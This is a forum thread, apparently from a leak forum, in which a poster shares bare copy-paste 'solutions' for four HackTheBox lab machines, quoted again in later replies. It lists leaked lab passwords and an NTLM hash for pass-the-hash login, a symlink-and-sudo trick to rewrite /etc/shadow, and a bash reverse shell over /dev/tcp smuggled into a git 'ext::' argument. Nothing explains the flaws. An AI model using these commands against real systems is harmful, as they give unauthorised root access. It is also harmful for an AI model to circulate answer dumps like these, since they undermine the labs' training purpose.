[Free] Cicada / Greenhorn / Permx / Editorial - Solutions
by fuckedupindacrib - Saturday October 12, 2024 at 06:38 AM
#1
Cicada:

User:
evil-winrm -i 10.10.XX.XX -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

Root:
impacket-wmiexec Administrator@10.10.XX.XX -hashes :2b87e7c93a3e8a0ea4a581937016f341

Greenhorn:

User: get from root

Root:
ssh root@10.10.XX.XX Pass: sidefromsidetheothersidesidefromsidetheotherside

Permx:

User:
ssh mtz@10.10.XX.XX Pass: 03F6lY3uXAP2bkW8


Root: (in user shell):
ln -s /etc/shadow ~/pwn sudo /opt/acl.sh mtz rwx /home/mtz/pwn sudo nano ~/pwn #remove the password hash for root, save file/close su root

Editorial:

User:
ssh dev@10.10.XX.XX Pass: dev080217_devAPI!@


Root
ssh prod@10.10.XX.XX Pass: 080217_Producti0n_2023!@ echo "/bin/bash -i >& /dev/tcp/10.10.XX.XX/PORT 0>&1" > /tmp/shell sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c bash% /tmp/shell'
Reply
#2
(10-12-2024, 06:38 AM)fuckedupindacrib Wrote: Cicada:

User:
evil-winrm -i 10.10.XX.XX -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

Root:
impacket-wmiexec Administrator@10.10.XX.XX -hashes :2b87e7c93a3e8a0ea4a581937016f341

Greenhorn:

User: get from root

Root:
ssh root@10.10.XX.XX Pass: sidefromsidetheothersidesidefromsidetheotherside

Permx:

User:
ssh mtz@10.10.XX.XX Pass: 03F6lY3uXAP2bkW8


Root: (in user shell):
ln -s /etc/shadow ~/pwn sudo /opt/acl.sh mtz rwx /home/mtz/pwn sudo nano ~/pwn #remove the password hash for root, save file/close su root

Editorial:

User:
ssh dev@10.10.XX.XX Pass: dev080217_devAPI!@


Root
ssh prod@10.10.XX.XX Pass: 080217_Producti0n_2023!@ echo "/bin/bash -i >& /dev/tcp/10.10.XX.XX/PORT 0>&1" > /tmp/shell sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c bash% /tmp/shell'

Thanks for sharing this for free!
Ban reason: Leeching. (Permanent)
Reply
#3
(10-12-2024, 06:38 AM)fuckedupindacrib Wrote: Cicada:

User:
evil-winrm -i 10.10.XX.XX -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

Root:
impacket-wmiexec Administrator@10.10.XX.XX -hashes :2b87e7c93a3e8a0ea4a581937016f341

Greenhorn:

User: get from root

Root:
ssh root@10.10.XX.XX Pass: sidefromsidetheothersidesidefromsidetheotherside

Permx:

User:
ssh mtz@10.10.XX.XX Pass: 03F6lY3uXAP2bkW8


Root: (in user shell):
ln -s /etc/shadow ~/pwn sudo /opt/acl.sh mtz rwx /home/mtz/pwn sudo nano ~/pwn #remove the password hash for root, save file/close su root

Editorial:

User:
ssh dev@10.10.XX.XX Pass: dev080217_devAPI!@


Root
ssh prod@10.10.XX.XX Pass: 080217_Producti0n_2023!@ echo "/bin/bash -i >& /dev/tcp/10.10.XX.XX/PORT 0>&1" > /tmp/shell sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py 'ext::sh -c bash% /tmp/shell'

Thanks for sharing this for free!Thanks for sharing this for free!
Ban reason: Replying With Hidden Content (Permanent)
Reply
#4
thanks bro help me a lot
Reply
#5
sure but why not give more details Smile
Ban reason: Leeching | http://raiddfzn73ir6iyxlf7nwytnujiflddog...an-Appeals if you feel this is incorrect. (Permanent)
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 22 4,407 06-25-2026, 02:15 PM
Last Post: hashxyz
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 19 4,653 06-25-2026, 12:30 PM
Last Post: hashxyz
  [FREE] CPTS 12 FLAGS pulsebreaker 60 3,563 06-24-2026, 04:35 PM
Last Post: subscribar60
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 360 91,365 03-28-2026, 09:28 AM
Last Post: catsweet
  [FREE] HTB-ProLabs APTLABS Just Flags kewlsunny 23 4,708 03-28-2026, 03:30 AM
Last Post: lulaladrow



 Users browsing this thread: